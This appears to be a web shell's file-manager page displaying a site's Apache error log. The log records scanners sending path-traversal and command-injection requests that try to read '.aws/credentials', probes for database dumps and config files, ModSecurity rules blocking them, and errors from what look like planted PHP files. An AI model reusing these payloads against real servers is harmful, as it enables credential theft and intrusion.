⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.81
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
apache
/
domlogs
/
View File Name :
cms.dev-unit.com.error.log
[Wed Jun 04 23:28:53.470799 2025] [authz_core:error] [pid 7206:tid 140249992779520] [client 139.59.143.102:51138] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Jun 04 23:28:53.877959 2025] [:error] [pid 7240:tid 140250111796992] [client 139.59.143.102:51220] File does not exist: /home/id/cms.dev-unit.com/info.php [Wed Jun 04 23:28:55.103856 2025] [authz_core:error] [pid 7240:tid 140250001172224] [client 139.59.136.184:60382] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Jun 04 23:28:55.673968 2025] [:error] [pid 7239:tid 140249892067072] [client 139.59.136.184:60476] File does not exist: /home/id/cms.dev-unit.com/info.php [Fri Jun 06 03:35:00.206105 2025] [:error] [pid 21091:tid 139942827083520] [client 5.62.57.46:1223] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 03:35:02.885269 2025] [:error] [pid 21093:tid 139942860654336] [client 5.62.57.46:1358] File does not exist: /home/id/cms.dev-unit.com/test.php [Fri Jun 06 03:35:14.261880 2025] [:error] [pid 11111:tid 139942885832448] [client 5.62.57.46:1334] File does not exist: /home/id/cms.dev-unit.com/index.php [Fri Jun 06 08:46:44.862270 2025] [:error] [pid 28114:tid 139905246152448] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/login_up.php [Fri Jun 06 08:46:46.155869 2025] [:error] [pid 28114:tid 139905078298368] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/pms"] [unique_id "aEKAxulGAz3AdDlN_29zPAAAAJc"] [Fri Jun 06 08:46:53.524511 2025] [:error] [pid 28114:tid 139905086691072] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aEKAzelGAz3AdDlN_29zQgAAAJY"] [Fri Jun 06 08:46:56.495034 2025] [:error] [pid 28114:tid 139905195796224] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php"] [unique_id "aEKA0OlGAz3AdDlN_29zRQAAAIk"] [Fri Jun 06 08:46:58.670042 2025] [:error] [pid 28114:tid 139905153832704] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php"] [unique_id "aEKA0ulGAz3AdDlN_29zRwAAAI4"] [Fri Jun 06 08:47:01.611118 2025] [:error] [pid 28114:tid 139905128654592] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/ajax_dashboard.php"] [unique_id "aEKA1elGAz3AdDlN_29zSQAAAJE"] [Fri Jun 06 08:47:03.063570 2025] [:error] [pid 28114:tid 139905095083776] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/remote/fgt_lang"] [unique_id "aEKA1-lGAz3AdDlN_29zSgAAAJU"] [Fri Jun 06 08:47:08.464383 2025] [:error] [pid 28114:tid 139905137047296] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php/core/preview"] [unique_id "aEKA3OlGAz3AdDlN_29zTgAAAJA"] [Fri Jun 06 08:47:57.684499 2025] [:error] [pid 28114:tid 139905162225408] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 08:47:58.907253 2025] [:error] [pid 28114:tid 139905271330560] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/info.php [Fri Jun 06 09:58:38.744863 2025] [:error] [pid 28204:tid 139905179010816] [client 213.232.87.230:44245] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aEKRnuwVtsTIuRogMJaFUAAAAMs"] [Fri Jun 06 09:58:38.906139 2025] [:error] [pid 28114:tid 139905153832704] [client 213.232.87.230:3199] File does not exist: /home/id/cms.dev-unit.com/wp-config.php [Fri Jun 06 09:58:38.973876 2025] [:error] [pid 28204:tid 139905195796224] [client 213.232.87.230:54525] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 09:58:38.996114 2025] [:error] [pid 28113:tid 139905220974336] [client 213.232.87.230:46125] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aEKRnusVXzdnbs2OP1eStwAAAEY"] [Fri Jun 06 09:58:39.073548 2025] [:error] [pid 28112:tid 139905103476480] [client 213.232.87.230:31393] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aEKRnwkSknyQfMO4nOyhDAAAABQ"] [Fri Jun 06 09:58:39.129057 2025] [:error] [pid 28114:tid 139905220974336] [client 213.232.87.230:56021] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aEKRn-lGAz3AdDlN_2933wAAAIY"] [Fri Jun 06 09:58:39.151775 2025] [:error] [pid 28204:tid 139905246152448] [client 213.232.87.230:19813] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database_backup.sql"] [unique_id "aEKRn-wVtsTIuRogMJaFWAAAAMM"] [Fri Jun 06 09:58:39.861783 2025] [:error] [pid 28113:tid 139905204188928] [client 213.232.87.230:25409] File does not exist: /home/id/cms.dev-unit.com/config.php [Fri Jun 06 09:58:39.868856 2025] [:error] [pid 28204:tid 139905162225408] [client 213.232.87.230:19023] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aEKRn-wVtsTIuRogMJaFWwAAAM0"] [Fri Jun 06 09:58:39.871234 2025] [:error] [pid 28114:tid 139905128654592] [client 213.232.87.230:48589] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aEKRn-lGAz3AdDlN_2934QAAAJE"] [Fri Jun 06 09:58:39.873837 2025] [authz_host:error] [pid 28204:tid 139905128654592] [client 213.232.87.230:30545] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Fri Jun 06 09:58:39.873850 2025] [authz_core:error] [pid 28204:tid 139905128654592] [client 213.232.87.230:30545] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Fri Jun 06 13:29:32.111667 2025] [:error] [pid 28113:tid 139905195796224] [client 185.177.72.104:62340] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 13:29:32.124157 2025] [:error] [pid 28113:tid 139905220974336] [client 185.177.72.104:62340] File does not exist: /home/id/cms.dev-unit.com/info.php [Sat Jun 07 16:10:01.741295 2025] [autoindex:error] [pid 29528:tid 140460420998912] [client 197.58.199.72:58083] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 07 16:10:32.173327 2025] [autoindex:error] [pid 15719:tid 140460547733248] [client 197.58.199.72:58100] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 07 16:16:48.449528 2025] [access_compat:error] [pid 15718:tid 140460379035392] [client 197.58.199.72:58123] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/installable/core/admin [Sat Jun 07 16:20:22.912446 2025] [access_compat:error] [pid 15720:tid 140460328679168] [client 197.58.199.72:58143] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/installable/core/admin [Sat Jun 07 16:22:35.972044 2025] [access_compat:error] [pid 15719:tid 140460437784320] [client 197.58.199.72:58152] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/admin [Sat Jun 07 16:45:19.342182 2025] [access_compat:error] [pid 15806:tid 140460437784320] [client 197.58.199.72:58259] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/admin [Tue Jun 10 05:22:14.609434 2025] [autoindex:error] [pid 15289:tid 140121730922240] [client 197.58.226.17:49782] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/installer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jul 15 02:01:57.453570 2025] [core:error] [pid 17099:tid 140038650115840] [client 54.212.177.106:54946] Script timed out before returning headers: index.php [Thu Jul 31 14:57:28.015476 2025] [:error] [pid 5230:tid 140191247279872] [client 198.144.182.13:41846] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Aug 03 00:54:05.192017 2025] [authz_core:error] [pid 29714:tid 140178358925056] [client 134.122.28.88:58440] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Mon Aug 11 21:41:58.841927 2025] [:error] [pid 1279:tid 1312] [client 198.144.182.13:38140] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Aug 12 07:14:49.485511 2025] [:error] [pid 28779:tid 28792] [client 198.144.182.13:49786] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 12:21:08.146520 2025] [:error] [pid 12142:tid 12154] [client 198.144.182.13:40564] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Aug 30 17:33:46.277953 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] Could not write to logfile: [Sat Aug 30 17:33:46.277995 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] Printing message to stderr: [Sat Aug 30 17:33:46.278071 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] [Sat Aug 30 17:33:46 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 17:33:46.278075 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] [Sat Aug 30 19:17:48.840925 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] Could not write to logfile: [Sat Aug 30 19:17:48.840970 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] Printing message to stderr: [Sat Aug 30 19:17:48.841047 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] [Sat Aug 30 19:17:48 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 19:17:48.841052 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] [Sat Aug 30 19:17:49.778152 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] Could not write to logfile:, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778198 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] Printing message to stderr:, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778274 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] [Sat Aug 30 19:17:49 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778279 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] , referer: https://cms.dev-unit.com/ [Tue Sep 09 20:43:09.023884 2025] [:error] [pid 4731:tid 4778] [client 4.217.236.50:4497] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Sep 16 02:38:59.151480 2025] [core:error] [pid 14350:tid 14364] [client 45.148.10.248:35178] Script timed out before returning headers: index.php [Tue Sep 16 02:38:59.170417 2025] [core:error] [pid 18995:tid 19069] [client 45.148.10.248:40868] Script timed out before returning headers: index.php [Sat Sep 20 10:51:08.852018 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 10:51:08.852213 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 10:51:08.852337 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 10:51:08.852432 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 10:51:08.852446 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] Stack trace:, referer: https://www.google.com [Sat Sep 20 10:51:08.852493 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 10:51:08.852503 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] #1 {main}, referer: https://www.google.com [Sat Sep 20 10:51:08.852554 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Sat Sep 20 16:49:36.233246 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 16:49:36.233437 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 16:49:36.233562 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 16:49:36.233653 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Fatal error: 